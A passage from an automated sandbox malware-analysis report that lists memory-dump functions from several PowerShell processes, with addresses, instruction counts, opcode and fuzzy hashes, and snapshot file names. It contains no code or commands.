                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e75462891ee533c043e2536d094e1fd2b73abbd26b182e048917eba41044534
                                            • Instruction ID: d59f6d2cc57cde007c2ab7b89b3b23dfdb36d19f3d24cbf38712af748639aebd
                                            • Opcode Fuzzy Hash: 5e75462891ee533c043e2536d094e1fd2b73abbd26b182e048917eba41044534
                                            • Instruction Fuzzy Hash: EBF0BE32B1E9098FD768EA5CE4919A873E4EF6533071600BAE06DC76B3CA25EC40C745
                                            Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0d3cb44cc6b2f7d559073430bc9a556b6d8b55ad96fd1d1a8e08f419d2e853f
                                            • Instruction ID: 3b30d820f02e4b631d5352e540c60fd939eb15341b3f21a83df3593ba4ee3d9a
                                            • Opcode Fuzzy Hash: a0d3cb44cc6b2f7d559073430bc9a556b6d8b55ad96fd1d1a8e08f419d2e853f
                                            • Instruction Fuzzy Hash: D8F05E32A0E5498FD768EA5CE4A19A877E0FF4532475600BAE15DCB5B3DA25AC40C750
                                            Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

                                            Non-executed Functions

                                            Function 00007FFD9B8A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: L_^4$L_^7$L_^F$L_^J
                                            • API String ID: 0-3225005683
                                            • Opcode ID: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                            • Instruction ID: 45c46be07a9f83af549c3a923de6fc2add619ee1d317f12e50de848940673ccf
                                            • Opcode Fuzzy Hash: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                            • Instruction Fuzzy Hash: E721D4B77085259ED30A7BBDBC199ED3740CB9427834552B3D2A98B093EA1460878AE0

                                            Executed Functions

                                            Function 00007FFD9B966605 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8c45826e7374cbec9469c53be0f2b02813a13aa4cbcc1ad0798ebe535f8ad14
                                            • Instruction ID: b6764d3bbbfa3afa1e852c0052589667d1e7985d7c5b09b6e1319c3bd596860e
                                            • Opcode Fuzzy Hash: d8c45826e7374cbec9469c53be0f2b02813a13aa4cbcc1ad0798ebe535f8ad14
                                            • Instruction Fuzzy Hash: DFD15632A1EB8E9FEBA59BA858655F57BE0EF52314B0901FED44CC70E3DA18AD01C341
                                            Function 00007FFD9B89A0E0 Relevance: .3, Instructions: 267COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 526cc0e3655bbd356ba8088f6664a386b76c859a8fb012d3b7491325dfef3030
                                            • Instruction ID: 7963bf9dd11692009cb5203fc2558549bf222990be87c409e4b5deeb9c8eafa2
                                            • Opcode Fuzzy Hash: 526cc0e3655bbd356ba8088f6664a386b76c859a8fb012d3b7491325dfef3030
                                            • Instruction Fuzzy Hash: 7F219D6690F7CD9FDB139B289C790D47FB0EF1721470A01E7C089CB0A3D92958498792
                                            Function 00007FFD9B899770 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f31a7066d747f4de7f8cbdefcce7c6921c20d4c7f2f7f0155e42940e4de55d4e
                                            • Instruction ID: 2a9cf716442829311858bba8182c05d16c9748b264e75e1d5eed2ee7dd4e9fc8
                                            • Opcode Fuzzy Hash: f31a7066d747f4de7f8cbdefcce7c6921c20d4c7f2f7f0155e42940e4de55d4e
                                            • Instruction Fuzzy Hash: F441087190DB889FDB189F5C9C4A6B97FE0FB59310F04416FE449D3292CA74A915CBC2
                                            Function 00007FFD9B89A64C Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                            • Instruction ID: eb7ea4035f4d3c6ccd3f87fdd779f72889c474952542e29e4713bd372978c180
                                            • Opcode Fuzzy Hash: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                            • Instruction Fuzzy Hash: 5721F83190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA749456CB92
                                            Function 00007FFD9B77EDDF Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1847913057.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                            • Instruction ID: dd590109c8d15fabc4b384aaa75b1de6e82b6e8f4a6bae447024e285fb581988
                                            • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                            • Instruction Fuzzy Hash: 18014F3160CE088FDAA4EF1DE485D5237E0FB98320710065AD45DC756AD771F892CBC1
                                            Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                            Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                            • Instruction ID: 0037cf7cd0e8da730bb9c57dfdf167aedc042902d057b13c57502d39fd69f30a
                                            • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                            • Instruction Fuzzy Hash: D0F0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741
                                            Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                            • Instruction ID: 71936907c65e5d25e9726e2641dbf7dddf597606121a57d3b6974e27c6721ca6
                                            • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                            • Instruction Fuzzy Hash: 0CF0BE32A0E5498FD769EB9CE0619A873E0FF0532071600BAE05DCB1A3CA26AC40C740
                                            Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

                                            Non-executed Functions

                                            Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                            • API String ID: 0-962139525
                                            • Opcode ID: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                            • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                            • Opcode Fuzzy Hash: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                            • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81

                                            Executed Functions

                                            Function 00007FFD9B986605 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1987049815.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67ef61f46b73b12671b9ea19df45689782c5e4df73b6f804f6c33aa60918573e
                                            • Instruction ID: 466a85472e6eb859c1c34c54dcaa097cc54044784ff85ca973ed2dc3b303b1b9
                                            • Opcode Fuzzy Hash: 67ef61f46b73b12671b9ea19df45689782c5e4df73b6f804f6c33aa60918573e
                                            • Instruction Fuzzy Hash: 2BD15732A1EF8D1FEBA5DBA858655B57BA0EF52314F0901FED44DCB0E3DA28A901C341
                                            Function 00007FFD9B8B9F7A Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0208868a2b9b9e9ad09fe340c580343b881fa4c6363a2e78eca948cbaae4f51
                                            • Instruction ID: 9dbade6586ce242c58a95b820cad547734061c0dfcd5ebca6736963cd84e1619
                                            • Opcode Fuzzy Hash: e0208868a2b9b9e9ad09fe340c580343b881fa4c6363a2e78eca948cbaae4f51
                                            • Instruction Fuzzy Hash: 48513173A0A5AD5FEB15AB6C9CB60D53BA0EF1532CF0902B3D4D88B0A3FC1525578AC1
                                            Function 00007FFD9B8B9738 Relevance: .1, Instructions: 144COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a109879993b8f9c18fe726fdf6eab745a10a9bc040c2ddd5322ceebfe5f8af8
                                            • Instruction ID: 7e1f4768eecd7fb16d6fb48d20591284ef6c67dad1d93289fa94fc3369b23526
                                            • Opcode Fuzzy Hash: 3a109879993b8f9c18fe726fdf6eab745a10a9bc040c2ddd5322ceebfe5f8af8
                                            • Instruction Fuzzy Hash: A3412B71A1DA488FDB589F5C985A6B87BE0FB99310F50412FE04893292DA24B8058BC6
                                            Function 00007FFD9B79EF04 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1985282154.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b79d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 53b0876a69e9456a782aee08ef81d2742f08c5ffc99c1e1b82ded13bb2586491
                                            • Instruction ID: 27d10a34531b4b5059911c73176948239071a242cb38b2e5020de550a3c5ac0f
                                            • Opcode Fuzzy Hash: 53b0876a69e9456a782aee08ef81d2742f08c5ffc99c1e1b82ded13bb2586491
                                            • Instruction Fuzzy Hash: 8241087140EBC44FD7968B2898559523FF1EF57324B1A06DFD088CB1B3D625A84AC792
                                            Function 00007FFD9B8BA47C Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c52ec7ebff16e9807d6403bfdfe9c163e88a95f045baccec759335b39484787e
                                            • Instruction ID: 07af6f977454887cd612c798804f290b888a9d09a1fdb36d1127d9a9f9463951
                                            • Opcode Fuzzy Hash: c52ec7ebff16e9807d6403bfdfe9c163e88a95f045baccec759335b39484787e
                                            • Instruction Fuzzy Hash: 7C210A3190C74C8FDB59DFAC984A7E97FF0EB9A321F04426BD049C3162DA74A41ACB91
                                            Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                            • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                            • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                            Function 00007FFD9B98414D Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1987049815.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                            • Instruction ID: a6b9057d2c591850f379ea75c523750cbee07cc55d99c16724fd30a545dc3bd5
                                            • Opcode Fuzzy Hash: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                            • Instruction Fuzzy Hash: BBF0BE32B0E9098FD76AEA5CE4519A873E0EF6532071600BAE06DC72B3CA35EC40C741
                                            Function 00007FFD9B984400 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1987049815.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                            • Instruction ID: 63d5de7804eeaba1e0dbdedc953e38d2050a6f7c98e83a431f02fcc399b2ec33
                                            • Opcode Fuzzy Hash: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                            • Instruction Fuzzy Hash: 67F0BE32A0E9498FD768EA6CE0609A873E0FF05324B1600BAE05DCB1A3CA25AC40C740
                                            Function 00007FFD9B9841D1 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1987049815.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: f848ec0fbad17b8826867ba541709e28433eada1e34e052a78df0744753283af
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: F1E01A31B1C8089FDAB9DA4CE051AA973E1EFA832171241BBD14EC7671CA32ED518B80

                                            Non-executed Functions

                                            Function 00007FFD9B8B8995 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: K_^$K_^$K_^$K_^
                                            • API String ID: 0-4267328068
                                            • Opcode ID: 030de4d7ada6b9be3fb7c4ce07f6e702a33c4ef0f9c2f75af0dd4ee08656df84
                                            • Instruction ID: 791ce120ad86c8ea83fefc14f312cf69c02a8bf2849c095e796685d499033379
                                            • Opcode Fuzzy Hash: 030de4d7ada6b9be3fb7c4ce07f6e702a33c4ef0f9c2f75af0dd4ee08656df84
                                            • Instruction Fuzzy Hash: 8F41B2A3A0F6E65FE726476858750D57FA0EF1636470E12F7C094CB0E3ED1825078692
                                            Function 00007FFD9B8B8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: K_^4$K_^7$K_^F$K_^J
                                            • API String ID: 0-377281160
                                            • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                            • Instruction ID: c815e6c2b718b347b84d3f063be8ded7c21d719f69ad06d17291c854427b9ce5
                                            • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                            • Instruction Fuzzy Hash: 3421D4B77085269ED70A7B7DBC589E93BA0DB9827834542F3D1A9CB093E91460878AD0

                                            Executed Functions

                                            Function 00007FFD9B76E701 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2202910305.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b76d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d$$J
                                            • API String ID: 0-3450148956
                                            • Opcode ID: c15472335ad82b2260bf4f2dd14a5fb67ec71e14dc5d4e3127df9ba14adaf50f
                                            • Instruction ID: 581fce6910501ac542d9435fd0d8a34aa25b8d3c0960d5da96979bda983d471d
                                            • Opcode Fuzzy Hash: c15472335ad82b2260bf4f2dd14a5fb67ec71e14dc5d4e3127df9ba14adaf50f
                                            • Instruction Fuzzy Hash: A741287150EBC48FD75A8B3998559523FF0EF56320B0A02DFD088CB1B3D625A846C7A3
                                            Function 00007FFD9B88644D Relevance: .7, Instructions: 710COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2205360928.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23282d0979261d67a84e94642f726eb0c8db23bd766e6d30428e4f8425670a1f
                                            • Instruction ID: dab4a3e57df756a0982e2d55a68c08167548893f6ceea47972e2995e97a92dcf
                                            • Opcode Fuzzy Hash: 23282d0979261d67a84e94642f726eb0c8db23bd766e6d30428e4f8425670a1f
                                            • Instruction Fuzzy Hash: 51D18170A08A4D8FDF99DF58C455AE9BBE1FF68300F15416AD41DD72A5CB34E881CB81
                                            Function 00007FFD9B956605 Relevance: .4, Instructions: 440COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2207754965.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d5935231175267a7e1f476a5356dd92b7a3a5292b05e8bc864af15c19f491ee
                                            • Instruction ID: 1164cbdbe1a0346eb077dc64d791d8dde66e59dfca8607eb57c72670edd4a8b9
                                            • Opcode Fuzzy Hash: 6d5935231175267a7e1f476a5356dd92b7a3a5292b05e8bc864af15c19f491ee
                                            • Instruction Fuzzy Hash: 79D15732B1FB8E1FEBA597A858655B57BA0EF12314B0901FED84DCB0E3D918AD01C341
                                            Function 00007FFD9B889750 Relevance: .1, Instructions: 146COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2205360928.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 110730508994332a00772603558f9a80c9310f576e22aef8d35dade9c24aaec7
                                            • Instruction ID: b2422d0720800cbbf0c380ca122fef84cef3c20a48114f5d882e5d9d88d450a1
                                            • Opcode Fuzzy Hash: 110730508994332a00772603558f9a80c9310f576e22aef8d35dade9c24aaec7
                                            • Instruction Fuzzy Hash: A341F47190DF888FDB19DF5C9C0A6A97BE0FB59310F04416FE49993292CA74A905CBC6
                                            Function 00007FFD9B88A49C Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2205360928.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e601311966e52a0ac7b773f1494f69aad0e23770a0f6d2f1b8dd3388de18ff54
                                            • Instruction ID: b1455a6bc20d6d07a40774cd322e00e9490c942af0c9c9c433d5bbf6937ef527
                                            • Opcode Fuzzy Hash: e601311966e52a0ac7b773f1494f69aad0e23770a0f6d2f1b8dd3388de18ff54
                                            • Instruction Fuzzy Hash: 1121283190CB4C4FDB59DFAC9C4A7E97FE0EB96320F04416BD048C31A2D674A846CB92
                                            Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2205360928.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                            Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2207754965.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                            Joe Sandbox IDA Plugin
